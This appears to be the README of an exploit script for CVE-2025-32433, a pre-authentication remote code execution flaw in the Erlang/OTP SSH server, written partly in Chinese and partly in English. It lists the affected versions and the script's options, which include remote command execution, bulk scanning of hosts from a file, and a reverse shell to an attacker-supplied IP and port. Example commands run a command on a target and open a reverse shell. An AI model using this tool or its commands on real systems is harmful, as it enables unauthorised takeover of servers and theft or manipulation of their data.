该漏洞允许具有网络访问权限的攻击者在无需事先认证的情况下,对 Erlang/OTP SSH 服务器执行任意代码。
已在 Erlang/OTP SSH 服务器中发现一个严重漏洞,可能允许攻击者执行未经认证的远程代码执行(RCE)。通过利用 SSH 协议消息处理中的缺陷,恶意行为者可在没有有效凭据的情况下获得对受影响系统的未授权访问并执行任意命令。这可能导致目标主机被攻陷,使第三方能够未经授权访问和操纵敏感数据,或发起拒绝服务攻击。
OTP-27.3.2 and earlier
OTP-26.2.5.10 and earlier
OTP-25.3.2.19 and earlier
python cve-2025-32433.py <host> [options]
选项:
-p PORT, --port PORT: SSH port (default: 22)
-t TIMEOUT, --timeout TIMEOUT: Connection timeout in seconds (default: 5)
-c COMMAND, --command COMMAND: Custom command to execute
--check: Check if the target is vulnerable
-u urls.txt, --urlfile urls.txt: File containing list of hosts to scan (one per line)
-o output.txt, --output output.txt: Output file to store results.
--shell: Launch a reverse shell
--lhost LHOST: Attacker's IP for reverse shell
--lport LPORT: Attacker's port for reverse shell (default: 4444)
python cve-2025-32433.py 127.0.0.1 --check
python cve-2025-32433.py 127.0.0.1 -c 'cat pwned.txt'
python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444